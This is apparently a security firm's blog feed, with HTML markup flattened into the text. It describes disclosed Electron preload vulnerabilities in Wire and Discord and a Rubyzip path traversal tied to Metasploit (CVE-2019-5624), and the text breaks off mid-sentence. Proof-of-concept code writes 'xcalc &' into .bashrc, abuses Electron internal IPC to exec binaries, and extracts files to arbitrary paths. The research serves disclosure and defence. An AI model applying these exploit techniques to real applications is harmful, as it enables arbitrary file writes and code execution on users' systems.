2 April 2019 at 22:00
pWe’re back from a href=https://www.blackhat.com/asia-19/briefings/schedule/index.html#preloading-insecurity-in-your-electron-13756BlackHat Asia 2019/a where we introduced a relatively unexplored class of vulnerabilities affecting a href=https://electronjs.org/Electron-based/a applications./p pDespite popular belief, secure-by-default settings are slowly becoming the norm and the dev community is gradually learning common pitfalls. Isolation is now widely deployed across all top Electron applications and so turning XSS into RCE isn’t child’s play anymore./p pimg src=../../../public/images/xss2rce.png width=500 alt=From Alert to Calc align=center //p pBrowserWindow a href=https://electronjs.org/docs/all#preloadpreload/a introduces a new and interesting attack vector. Even without a framework bug (e.g. code class=language-plaintext highlighter-rougenodeIntegration/code bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner./p blockquote pYou can download the slides of our talk from the official BlackHat Briefings archive: a href=http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdfhttp://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf/a/p /blockquote h3 id=preloading-insecurity-in-your-electronPreloading Insecurity In Your Electron/h3 pPreload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page’s code class=language-plaintext highlighter-rougewindow/code object as shown in the official documentation:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdlet/span span class=nxwin/span span class=nxapp/spanspan class=p./spanspan class=nxon/spanspan class=p(/spanspan class=dl'/spanspan class=s1ready/spanspan class=dl'/spanspan class=p,/span span class=p()/span span class=o=gt;/span span class=p{/span span class=nxwin/span span class=o=/span span class=knew/span span class=nxBrowserWindow/spanspan class=p({/span span class=nawebPreferences/spanspan class=p:/span span class=p{/span span class=nasandbox/spanspan class=p:/span span class=kctrue/spanspan class=p,/span span class=napreload/spanspan class=p:/span span class=dl'/spanspan class=s1preload.js/spanspan class=dl'/span span class=p}/span span class=p})/span span class=nxwin/spanspan class=p./spanspan class=nxloadURL/spanspan class=p(/spanspan class=dl'/spanspan class=s1http://google.com/spanspan class=dl'/spanspan class=p)/span span class=p})/span /code/pre/div/div pempreload.js/em can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdconst/span span class=nxfs/span span class=o=/span span class=nxrequire/spanspan class=p(/spanspan class=dl'/spanspan class=s1fs/spanspan class=dl'/spanspan class=p)/span span class=kdconst/span span class=p{/span span class=nxipcRenderer/span span class=p}/span span class=o=/span span class=nxrequire/spanspan class=p(/spanspan class=dl'/spanspan class=s1electron/spanspan class=dl'/spanspan class=p)/span span class=c1// read a configuration file using the `fs` module/span span class=kdconst/span span class=nxbuf/span span class=o=/span span class=nxfs/spanspan class=p./spanspan class=nxreadFileSync/spanspan class=p(/spanspan class=dl'/spanspan class=s1allowed-popup-urls.json/spanspan class=dl'/spanspan class=p)/span span class=kdconst/span span class=nxallowedUrls/span span class=o=/span span class=nxJSON/spanspan class=p./spanspan class=nxparse/spanspan class=p(/spanspan class=nxbuf/spanspan class=p./spanspan class=nxtoString/spanspan class=p(/spanspan class=dl'/spanspan class=s1utf8/spanspan class=dl'/spanspan class=p))/span span class=kdconst/span span class=nxdefaultWindowOpen/span span class=o=/span span class=nbwindow/spanspan class=p./spanspan class=nxopen/span span class=kdfunction/span span class=nxcustomWindowOpen/span span class=p(/spanspan class=nxurl/spanspan class=p,/span span class=p.../spanspan class=nxargs/spanspan class=p)/span span class=p{/span span class=kif/span span class=p(/spanspan class=nxallowedUrls/spanspan class=p./spanspan class=nxindexOf/spanspan class=p(/spanspan class=nxurl/spanspan class=p)/span span class=o===/span span class=o-/spanspan class=mi1/spanspan class=p)/span span class=p{/span span class=nxipcRenderer/spanspan class=p./spanspan class=nxsendSync/spanspan class=p(/spanspan class=dl'/spanspan class=s1blocked-popup-notification/spanspan class=dl'/spanspan class=p,/span span class=nxlocation/spanspan class=p./spanspan class=nxorigin/spanspan class=p,/span span class=nxurl/spanspan class=p)/span span class=kreturn/span span class=kcnull/span span class=p}/span span class=kreturn/span span class=nxdefaultWindowOpen/spanspan class=p(/spanspan class=nxurl/spanspan class=p,/span span class=p.../spanspan class=nxargs/spanspan class=p)/span span class=p}/span span class=nbwindow/spanspan class=p./spanspan class=nxopen/span span class=o=/span span class=nxcustomWindowOpen/span span class=p[...]/span /code/pre/div/div pThrough performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications using all recommended a href=https://electronjs.org/docs/tutorial/securitysecurity best practices/a, we were able to turn boring XSS into RCE in a matter of hours./p pThis prompted us to further research the topic and categorize four types of stronginsecure preloads/strong:/p ul li pstrong(1) Preload scripts can reintroduce emNode/em global symbols back to the global scope/strong/p pWhile it is evident that reintroducing some Node global symbols (e.g. code class=language-plaintext highlighter-rougeprocess/code) to the renderer is dangerous, the risk is not immediately obvious for classes like code class=language-plaintext highlighter-rougeBuffer/code (which can be leveraged for a code class=language-plaintext highlighter-rougenodeIntegration/code bypass)/p /li li pstrong(2) Preload scripts can introduce functionalities that can be abused by untrusted code/strong/p pPreload scripts have access to Node.js, and the functions exported by applications to the global code class=language-plaintext highlighter-rougewindow/code often include dangerous primitives/p /li li pstrong(3) Preload scripts can facilitate code class=language-plaintext highlighter-rougesandbox/code bypasses/strong/p pEven with code class=language-plaintext highlighter-rougesandbox/code enabled, preload scripts still have access to Node.JS native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code that could facilitate code class=language-plaintext highlighter-rougesandbox/code bypasses/p /li li pstrong(4) Without code class=language-plaintext highlighter-rougecontextIsolation/code, the integrity of preload scripts is not guaranteed/strong/p pWhen isolated words are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc./p /li /ul pIn this blog post, we will analyze a couple of vulnerabilities belonging to group (2) which we discovered in two popular applications: a href=https://wire.com/Wire App/a and a href=https://discordapp.com/Discord/a./p pFor more vulnerabilities and examples, please refer to our presentation./p h3 id=wireapp-desktop-arbitrary-file-write-via-insecure-preloadWireApp Desktop Arbitrary File Write via Insecure Preload/h3 pa href=https://wire.com/Wire App/a is a self-proclaimed em“most secure collaboration platform”/em. It’s a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a code class=language-plaintext highlighter-rougeBrowserWindow/code with code class=language-plaintext highlighter-rougenodeIntegration/code disabled, in which a a href=https://electronjs.org/docs/api/webview-tagwebview/a HTML tag is used./p pimg src=../../../public/images/wiredesign.png alt=Wire App frames width=550 align=center //p pDespite enforcing isolation, the code class=language-plaintext highlighter-rougeweb-view-preload.js/code preload file contains the following code:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdconst/span span class=nxwebViewLogger/span span class=o=/span span class=knew/span span class=nxwinston/spanspan class=p./spanspan class=nxLogger/spanspan class=p();/span span class=nxwebViewLogger/spanspan class=p./spanspan class=nxadd/spanspan class=p(/spanspan class=nxwinston/spanspan class=p./spanspan class=nxtransports/spanspan class=p./spanspan class=nxFile/spanspan class=p,/span span class=p{/span span class=nafilename/spanspan class=p:/span span class=nxlogFilePath/spanspan class=p,/span span class=nahandleExceptions/spanspan class=p:/span span class=kctrue/spanspan class=p,/span span class=p});/span span class=nxwebViewLogger/spanspan class=p./spanspan class=nxinfo/spanspan class=p(/spanspan class=nxconfig/spanspan class=p./spanspan class=nxNAME/spanspan class=p,/span span class=dl'/spanspan class=s1Version/spanspan class=dl'/spanspan class=p,/span span class=nxconfig/spanspan class=p./spanspan class=nxVERSION/spanspan class=p);/span span class=c1// webapp uses global winston reference to define log level/span span class=nbglobal/spanspan class=p./spanspan class=nxwinston/span span class=o=/span span class=nxwebViewLogger/spanspan class=p;/span /code/pre/div/div pCode running in the isolated renderer (e.g. XSS) can override the logger’s transport setting in order to obtain a file write primitive./p pThis issue can be easily verified by switching to the messages view:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nbwindow/spanspan class=p./spanspan class=nbdocument/spanspan class=p./spanspan class=nxgetElementsByTagName/spanspan class=p(/spanspan class=dl/spanspan class=s2webview/spanspan class=dl/spanspan class=p)[/spanspan class=mi0/spanspan class=p]./spanspan class=nxopenDevTools/spanspan class=p();/span /code/pre/div/div pBefore executing the following code:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdfunction/span span class=nxformatme/spanspan class=p(/spanspan class=nxargs/spanspan class=p)/span span class=p{/span span class=kdvar/span span class=nxlogMessage/span span class=o=/span span class=nxargs/spanspan class=p./spanspan class=nxmessage/spanspan class=p;/span span class=kreturn/span span class=nxlogMessage/spanspan class=p;/span span class=p}/span span class=nxwinston/spanspan class=p./spanspan class=nxtransports/spanspan class=p./spanspan class=nxfile/span span class=o=/span span class=p(/spanspan class=knew/span span class=nxwinston/spanspan class=p./spanspan class=nxtransports/spanspan class=p./spanspan class=nxfile/spanspan class=p./spanspan class=nx__proto__/spanspan class=p./spanspan class=kdconstructor/spanspan class=p({/span span class=nadirname/spanspan class=p:/span span class=dl'/spanspan class=s1/home/ikki//spanspan class=dl'/spanspan class=p,/span span class=nalevel/spanspan class=p:/span span class=dl'/spanspan class=s1error/spanspan class=dl'/spanspan class=p,/span span class=nafilename/spanspan class=p:/span span class=dl'/spanspan class=s1.bashrc/spanspan class=dl'/spanspan class=p,/span span class=najson/spanspan class=p:/span span class=kcfalse/spanspan class=p,/span span class=naformatter/spanspan class=p:/span span class=nxformatme/span span class=p}))/span span class=nxwinston/spanspan class=p./spanspan class=nxerror/spanspan class=p(/spanspan class=dl'/spanspan class=s1xcalc amp;/spanspan class=dl'/spanspan class=p);/span /code/pre/div/div video controls= preload=auto width=100% height=100% poster=../../../public/images/wireappvuln.png source src=../../../public/images/wiredemo.mp4 type=video/mp4 / Your browser does not support the video tag. /video pbr //p pThis issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass./p pA security patch was released on a href=https://medium.com/wire-news/windows-3-7-2904-52c56b1113afMarch 14, 2019/a, just few days after our disclosure./p h3 id=discord-desktop-arbitrary-ipc-via-insecure-preloadDiscord Desktop Arbitrary IPC via Insecure Preload/h3 pa href=https://discordapp.com/Discord/a is a popular voice and text chat used by over 250 million gamers. The application implements isolation by simply using a code class=language-plaintext highlighter-rougeBrowserWindow/code with code class=language-plaintext highlighter-rougenodeIntegration/code disabled. Despite that, the preload script (emapp/mainScreenPreload.js/em) in use by the same code class=language-plaintext highlighter-rougeBrowserWindow/code contains multiple exports including the following:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdvar/span span class=nxDiscordNative/span span class=o=/span span class=p{/span span class=naisRenderer/spanspan class=p:/span span class=nxprocess/spanspan class=p./spanspan class=nxtype/span span class=o===/span span class=dl'/spanspan class=s1renderer/spanspan class=dl'/spanspan class=p,/span span class=c1//../span span class=naipc/spanspan class=p:/span span class=nxrequire/spanspan class=p(/spanspan class=dl'/spanspan class=s1./discord_native/ipc/spanspan class=dl'/spanspan class=p),/span span class=p};/span span class=c1//../span span class=nxprocess/spanspan class=p./spanspan class=nxonce/spanspan class=p(/spanspan class=dl'/spanspan class=s1loaded/spanspan class=dl'/spanspan class=p,/span span class=kdfunction/span span class=p()/span span class=p{/span span class=nbglobal/spanspan class=p./spanspan class=nxDiscordNative/span span class=o=/span span class=nxDiscordNative/spanspan class=p;/span span class=c1//../span span class=p}/span /code/pre/div/div pwhere emapp/discord_native/ipc.js/em contains the following code:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=kdvar/span span class=nxelectron/span span class=o=/span span class=nxrequire/spanspan class=p(/spanspan class=dl'/spanspan class=s1electron/spanspan class=dl'/spanspan class=p);/span span class=kdvar/span span class=nxipcRenderer/span span class=o=/span span class=nxelectron/spanspan class=p./spanspan class=nxipcRenderer/spanspan class=p;/span span class=kdfunction/span span class=nxsend/spanspan class=p(/spanspan class=nxevent/spanspan class=p)/span span class=p{/span span class=kfor/span span class=p(/spanspan class=kdvar/span span class=nx_len/span span class=o=/span span class=nxarguments/spanspan class=p./spanspan class=nxlength/spanspan class=p,/span span class=nxargs/span span class=o=/span span class=nbArray/spanspan class=p(/spanspan class=nx_len/span span class=ogt;/span span class=mi1/span span class=p?/span span class=nx_len/span span class=o-/span span class=mi1/span span class=p:/span span class=mi0/spanspan class=p),/span span class=nx_key/span span class=o=/span span class=mi1/spanspan class=p;/span span class=nx_key/span span class=olt;/span span class=nx_len/spanspan class=p;/span span class=nx_key/spanspan class=o++/spanspan class=p)/span span class=p{/span span class=nxargs/spanspan class=p[/spanspan class=nx_key/span span class=o-/span span class=mi1/spanspan class=p]/span span class=o=/span span class=nxarguments/spanspan class=p[/spanspan class=nx_key/spanspan class=p];/span span class=p}/span span class=nxipcRenderer/spanspan class=p./spanspan class=nxsend/spanspan class=p./spanspan class=nxapply/spanspan class=p(/spanspan class=nxipcRenderer/spanspan class=p,/span span class=p[/spanspan class=nxevent/spanspan class=p]./spanspan class=nxconcat/spanspan class=p(/spanspan class=nxargs/spanspan class=p));/span span class=p}/span span class=kdfunction/span span class=nxon/spanspan class=p(/spanspan class=nxevent/spanspan class=p,/span span class=nxcallback/spanspan class=p)/span span class=p{/span span class=nxipcRenderer/spanspan class=p./spanspan class=nxon/spanspan class=p(/spanspan class=nxevent/spanspan class=p,/span span class=nxcallback/spanspan class=p);/span span class=p}/span span class=nxmodule/spanspan class=p./spanspan class=nxexports/span span class=o=/span span class=p{/span span class=nasend/spanspan class=p:/span span class=nxsend/spanspan class=p,/span span class=naon/spanspan class=p:/span span class=nxon/span span class=p};/span /code/pre/div/div pWithout going into details, this script is basically a wrapper for the official Electron’s a href=https://electronjs.org/docs/api/ipc-renderer#ipcrenderersendchannel-arg1-arg2-asynchronous IPC mechanism/a in order to exchange messages from the render process (web page) to the main process./p pIn Electron, code class=language-plaintext highlighter-rougeipcMain/code and code class=language-plaintext highlighter-rougeipcRenderer/code modules are used to implement IPC between the main process and the renderers but they’re also leveraged for internal native framework invocations. For instance, the code class=language-plaintext highlighter-rougewindow.close()/code function is implemented using the following event listener:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=c1// Implements window.close()/span span class=nxipcMainInternal/spanspan class=p./spanspan class=nxon/spanspan class=p(/spanspan class=dl'/spanspan class=s1ELECTRON_BROWSER_WINDOW_CLOSE/spanspan class=dl'/spanspan class=p,/span span class=kdfunction/span span class=p(/spanspan class=nxevent/spanspan class=p)/span span class=p{/span span class=kdconst/span span class=nbwindow/span span class=o=/span span class=nxevent/spanspan class=p./spanspan class=nxsender/spanspan class=p./spanspan class=nxgetOwnerBrowserWindow/spanspan class=p()/span span class=kif/span span class=p(/spanspan class=nbwindow/spanspan class=p)/span span class=p{/span span class=nbwindow/spanspan class=p./spanspan class=nxclose/spanspan class=p()/span span class=p}/span span class=nxevent/spanspan class=p./spanspan class=nxreturnValue/span span class=o=/span span class=kcnull/span span class=p})/span /code/pre/div/div pAs there’s no separation between application-level IPC messages and the code class=language-plaintext highlighter-rougeELECTRON_/code internal channel, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework’s security mechanism./p pFor example, the following synchronous IPC calls can be used to execute an arbitrary binary:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=p(/spanspan class=kdfunction/span span class=p()/span span class=p{/span span class=kdvar/span span class=nxipcRenderer/span span class=o=/span span class=nxrequire/spanspan class=p(/spanspan class=dl'/spanspan class=s1electron/spanspan class=dl'/spanspan class=p)./spanspan class=nxipcRenderer/span span class=kdvar/span span class=nxelectron/span span class=o=/span span class=nxipcRenderer/spanspan class=p./spanspan class=nxsendSync/spanspan class=p(/spanspan class=dl/spanspan class=s2ELECTRON_BROWSER_REQUIRE/spanspan class=dl/spanspan class=p,/spanspan class=dl/spanspan class=s2electron/spanspan class=dl/spanspan class=p);/span span class=kdvar/span span class=nxshell/span span class=o=/span span class=nxipcRenderer/spanspan class=p./spanspan class=nxsendSync/spanspan class=p(/spanspan class=dl/spanspan class=s2ELECTRON_BROWSER_MEMBER_GET/spanspan class=dl/spanspan class=p,/span span class=nxelectron/spanspan class=p./spanspan class=nxid/spanspan class=p,/span span class=dl/spanspan class=s2shell/spanspan class=dl/spanspan class=p);/span span class=kreturn/span span class=nxipcRenderer/spanspan class=p./spanspan class=nxsendSync/spanspan class=p(/spanspan class=dl/spanspan class=s2ELECTRON_BROWSER_MEMBER_CALL/spanspan class=dl/spanspan class=p,/span span class=nxshell/spanspan class=p./spanspan class=nxid/spanspan class=p,/span span class=dl/spanspan class=s2openExternal/spanspan class=dl/spanspan class=p,/span span class=p[{/span span class=natype/spanspan class=p:/span span class=dl'/spanspan class=s1value/spanspan class=dl'/spanspan class=p,/span span class=navalue/spanspan class=p:/span span class=dl/spanspan class=s2file:///Applications/Calculator.app/spanspan class=dl/span span class=p}]);/span span class=p})();/span /code/pre/div/div pIn the case of the Discord’s preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference of the objects from the function exposed in the untrusted window, an attacker can still brute-force the reference of the code class=language-plaintext highlighter-rougechild_process/code using the following code:/p div class=language-javascript highlighter-rougediv class=highlightpre class=highlightcodespan class=nxDiscordNative/spanspan class=p./spanspan class=nxipc/spanspan class=p./spanspan class=nxsend/spanspan class=p(/spanspan class=dl/spanspan class=s2ELECTRON_BROWSER_REQUIRE/spanspan class=dl/spanspan class=p,/spanspan class=dl/spanspan class=s2child_process/spanspan class=dl/spanspan class=p);/span span class=kfor/spanspan class=p(/spanspan class=kdvar/span span class=nxi/spanspan class=o=/spanspan class=mi0/spanspan class=p;/spanspan class=nxi/spanspan class=olt;/spanspan class=mi50/spanspan class=p;/spanspan class=nxi/spanspan class=o++/spanspan class=p){/span span class=nxDiscordNative/spanspan class=p./spanspan class=nxipc/spanspan class=p./spanspan class=nxsend/spanspan class=p(/spanspan class=dl/spanspan class=s2ELECTRON_BROWSER_MEMBER_CALL/spanspan class=dl/spanspan class=p,/span span class=nxi/spanspan class=p,/span span class=dl/spanspan class=s2exec/spanspan class=dl/spanspan class=p,/span span class=p[{/span span class=natype/spanspan class=p:/span span class=dl'/spanspan class=s1value/spanspan class=dl'/spanspan class=p,/span span class=navalue/spanspan class=p:/span span class=dl/spanspan class=s2calc.exe/spanspan class=dl/span span class=p}]);/span span class=p}/span /code/pre/div/div video controls= preload=auto width=100% height=100% poster=../../../public/images/discordvuln.png source src=../../../public/images/discorddemoipc.mp4 type=video/mp4 / Your browser does not support the video tag. /video pbr //p pThis issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards compatibility code with old clients./p

On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

23 April 2019 at 22:00
pDuring one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the a href=https://github.com/Rubyzip/RubyzipRubyzip/a gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation./p pstrongThis blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - a href=https://blog.rapid7.com/2019/04/19/metasploit-wrap-up-13/Metasploit/a./strong/p hr / h2 id=rubyzip-and-old-vulnerabilitiesRubyzip and old vulnerabilities/h2 pThe emRubyzip/em gem has a long history of path traversal vulnerabilities (a href=https://github.com/Rubyzip/Rubyzip/issues/3151/a, a href=https://github.com/Rubyzip/Rubyzip/issues/3692/a) through malicious filenames. Particularly interesting was the code change in PR a href=https://github.com/Rubyzip/Rubyzip/pull/376#376/a where a different handling was implemented by the developers./p div class=language-rb highlighter-rougediv class=highlightpre class=highlightcodespan class=c1# Extracts entry to file dest_path (defaults to @name)./span span class=c1# NB: The caller is responsible for making sure dest_path is safe, /span span class=c1# if it is passed./span span class=kdef/span span class=nfextract/spanspan class=p(/spanspan class=ndest_path/span span class=o=/span span class=kpnil/spanspan class=p,/span span class=oamp;/spanspan class=nblock/spanspan class=p)/span span class=kif/span span class=ndest_path/spanspan class=p./spanspan class=nfnil?/span span class=oamp;amp;/span span class=o!/spanspan class=nname_safe?/span span class=nbputs/span span class=s2WARNING: skipped /spanspan class=si#{/spanspan [email protected]/spanspan class=si}/spanspan class=s2 as unsafe/span span class=kreturn/span span class=nbself/span span class=kend/span span class=p[/spanspan class=o.../spanspan class=p]/span /code/pre/div/div pcode class=language-plaintext highlighter-rougeEntry#name_safe/code is defined a href=https://github.com/Rubyzip/Rubyzip/blob/master/lib/zip/entry.rb#L112a few lines before/a as:/p div class=language-rb highlighter-rougediv class=highlightpre class=highlightcodespan class=c1# Is the name a relative path, free of `..` patterns that could lead to/span span class=c1# path traversal attacks? This does NOT handle symlinks; if the path/span span class=c1# contains symlinks, this check is NOT enough to guarantee safety./span span class=kdef/span span class=nfname_safe?/span span class=ncleanpath/span span class=o=/span span class=noPathname/spanspan class=p./spanspan class=nfnew/spanspan class=p(/spanspan [email protected]/spanspan class=p)./spanspan class=nfcleanpath/span span class=kreturn/span span class=kpfalse/span span class=kunless/span span class=ncleanpath/spanspan class=p./spanspan class=nfrelative?/span span class=nroot/span span class=o=/span span class=o::/spanspan class=noFile/spanspan class=o::/spanspan class=noSEPARATOR/span span class=nnaive_expanded_path/span span class=o=/span span class=o::/spanspan class=noFile/spanspan class=p./spanspan class=nfjoin/spanspan class=p(/spanspan class=nroot/spanspan class=p,/span span class=ncleanpath/spanspan class=p./spanspan class=nfto_s/spanspan class=p)/span span class=ncleanpath/spanspan class=p./spanspan class=nfexpand_path/spanspan class=p(/spanspan class=nroot/spanspan class=p)./spanspan class=nfto_s/span span class=o==/span span class=nnaive_expanded_path/span span class=kend/span /code/pre/div/div pIn the code above, if the destination path is passed to the code class=language-plaintext highlighter-rougeEntry#extract/code function then it is not actually checked. A a href=https://github.com/Rubyzip/Rubyzip/blob/master/lib/zip/entry.rb#L160comment/a in the source code of that function highlights the user’s responsibility:/p blockquote p# NB: The caller is responsible for making sure dest_path is safe, if it is passed./p /blockquote pWhile the code class=language-plaintext highlighter-rougeEntry#name_safe/code is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments./p pIn order to verify the library bug we generated a ZIP PoC using the old (and still good) a href=https://github.com/ptoomey3/evilarcevilarc/a, and extracted the malicious file using the following code:/p div class=language-rb highlighter-rougediv class=highlightpre class=highlightcodespan class=nbrequire/span span class=s1'zip'/span span class=nfirst_arg/spanspan class=p,/span span class=o*/spanspan class=nthe_rest/span span class=o=/span span class=noARGV/span span class=noZip/spanspan class=o::/spanspan class=noFile/spanspan class=p./spanspan class=nfopen/spanspan class=p(/spanspan class=nfirst_arg/spanspan class=p)/span span class=kdo/span span class=o|/spanspan class=nzip_file/spanspan class=o|/span span class=nzip_file/spanspan class=p./spanspan class=nfeach/span span class=kdo/span span class=o|/spanspan class=nentry/spanspan class=o|/span span class=nbputs/span span class=s2Extracting /spanspan class=si#{/spanspan class=nentry/spanspan class=p./spanspan class=nfname/spanspan class=si}/spanspan class=s2/span span class=nentry/spanspan class=p./spanspan class=nfextract/spanspan class=p(/spanspan class=nentry/spanspan class=p./spanspan class=nfname/spanspan class=p)/span span class=kend/span span class=kend/span /code/pre/div/div div class=language-sh highlighter-rougediv class=highlightpre class=highlightcodespan class=nv$ /spanspan class=nbls/span /tmp/file.txt span class=nbls/span: cannot access span class=s1'/tmp/file.txt'/span: No such file or directory span class=nv$ /spanzipinfo absolutepath.zip Archive: absolutepath.zip Zip file size: 289 bytes, number of entries: 2 drwxr-xr-x 2.1 unx 0 bx stor 18-Jun-13 20:13 /tmp/ span class=nt-rw-r--r--/span 2.1 unx 5 bX defN 18-Jun-13 20:13 /tmp/file.txt 2 files, 5 bytes uncompressed, 7 bytes compressed: span class=nt-40/span.0% span class=nv$ /spanruby Rubyzip-poc.rb absolutepath.zip Extracting /tmp/ Extracting /tmp/file.txt span class=nv$ /spanspan class=nbls/span /tmp/file.txt /tmp/file.txt /code/pre/div/div pResulting in a file being created in em/tmp/file.txt/em, which confirms the issue./p pAs happened with our client, most developers might have upgraded to a href=https://nvd.nist.gov/vuln/detail/CVE-2018-1000544Rubyzip 1.2.2/a thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase./p h2 id=it-would-have-been-vulnerable-anyway-_ツ_It would have been vulnerable anyway code class=language-plaintext highlighter-rouge¯\_(ツ)_/¯/code/h2 pIn the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:/p div class=language-rb highlighter-rougediv class=highlightpre class=highlightcodespan class=kdef/span span class=nfunzip/spanspan class=p(/spanspan class=ninput/spanspan class=p)/span span class=nuuid/span span class=o=/span span class=nget_uuid/spanspan class=p()/span span class=c1# 0. create a 'Pathname' object with the new uuid/span span class=nparent_directory/span span class=o=/span span class=noPathname/spanspan class=p./spanspan class=nfnew/spanspan class=p(/spanspan class=s2/spanspan class=si#{/spanspan class=noENV/spanspan class=p[/spanspan class=s1'uploads_dir'/spanspan class=p]/spanspan class=si}/spanspan class=s2//spanspan class=si#{/spanspan class=nuuid/spanspan class=si}/spanspan class=s2/spanspan class=p)/span span class=noZip/spanspan class=o::/spanspan class=noFile/spanspan class=p./spanspan class=nfopen/spanspan class=p(/spanspan class=ninput/spanspan class=p[/spanspan class=ss:zip_file/spanspan class=p]./spanspan class=nfto_io/spanspan class=p)/span span class=kdo/span span class=o|/spanspan class=nzip_file/spanspan class=o|/span span class=nzip_file/spanspan class=p./spanspan class=nfeach_with_index/span span class=kdo/span span class=o|/spanspan class=nentry/spanspan class=p,/span span class=nindex/spanspan class=o|/span span class=c1# 1. check the file is not present/span span class=knext/span span class=kif/span span class=noFile/spanspan class=p./spanspan class=nffile?/spanspan class=p(/spanspan class=nparent_directory/span span class=o+/span span class=nentry/spanspan class=p./spanspan class=nfname/spanspan class=p)/span span class=c1# 2. extract the entry/span span class=nentry/spanspan class=p./spanspan class=nfextract/spanspan class=p(/spanspan class=nparent_directory/span span class=o+/span span class=nentry/spanspan class=p./spanspan class=nfname/spanspan class=p)/span span class=kend/span span class=kend/span span class=noSuccess/span span class=kend/span /code/pre/div/div pIn item #0 we can see that a code class=language-plaintext highlighter-rougePathname/code object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior./p pWe can easily understand its behavior in an IRB shell:/p div class=language-sh highlighter-rougediv class=highlightpre class=highlightcodespan class=nv$ /spanirb irbspan class=o(/spanmainspan class=o)/span:001:0gt; require span class=s1'pathname'/span span class=o=gt;/span span class=nbtrue /spanirbspan class=o(/spanmainspan class=o)/span:002:0gt; parent_directory span class=o=/span Pathname.newspan class=o(/spanspan class=s2/tmp/random_uuid//spanspan class=o)/span span class=o=gt;/span span class=c#lt;Pathname:/tmp/random_uuid/gt;/span irbspan class=o(/spanmainspan class=o)/span:003:0gt; entry_path span class=o=/span Pathname.newspan class=o(/spanparent_directory + File.dirnamespan class=o(/spanspan class=s2../../path/traversal/spanspan class=o))/span span class=o=gt;/span span class=c#lt;Pathname:/pathgt;/span irbspan class=o(/spanmainspan class=o)/span:004:0gt; destination_folder span class=o=/span Pathname.newspan class=o(/spanparent_directory + span class=s2../../path/traversal/spanspan class=o)/span span class=o=gt;/span span class=c#lt;Pathname:/path/traversalgt;/span irbspan class=o(/spanmainspan class=o)/span:005:0gt; parent_directory + span class=s2../../path/traversal/span span class=o=gt;/span span class=c#lt;Pathname:/path/traversalgt;/span /code/pre/div/div pThanks to the interpretation of the code class=language-plaintext highlighter-rouge..//code by code class=language-plaintext highlighter-rougePathname/code, the argument to Rubyzip’s code class=language-plaintext highlighter-rougeEntry#extract/code call does not contain any path traversal payloads which results in a mistakenly supposed “emsafe/em” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation./p h2 id=from-arbitrary-file-write-to-rce-ror-styleFrom Arbitrary File Write to RCE (RoR Style)/h2 pApart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application./p pSince our target was running in emproduction/em environments, RoR classes were a href=https://guides.rubyonrails.org/autoloading_and_reloading_constants.html#autoload-paths-and-eager-load-pathscached on first usage/a via the emcache_classes/em directive. During the time allocated for the engagement we didn’t find a strongreliable/strong way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot./p pHowever, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability./p pThe official a href=https://guides.rubyonrails.org/v2.3/configuring.html#using-initializersdocumentation/a explains that:/p blockquote pAfter it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded./p /blockquote pUsing this feature, an attacker with the right privileges can add a malicious code class=language-plaintext highlighter-rouge.rb/code in the code class=language-plaintext highlighter-rouge/config/initializers/code folder which will be loaded at web server (re)boot./p h2 id=attacking-the-attackers-metasploit-authenticated-rce-cve-2019-5624Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)/h2 pJust after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: a href=https://www.metasploit.com/Metasploit Framework/a/p pGoing through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the code class=language-plaintext highlighter-rougeextract/code function, we recalled 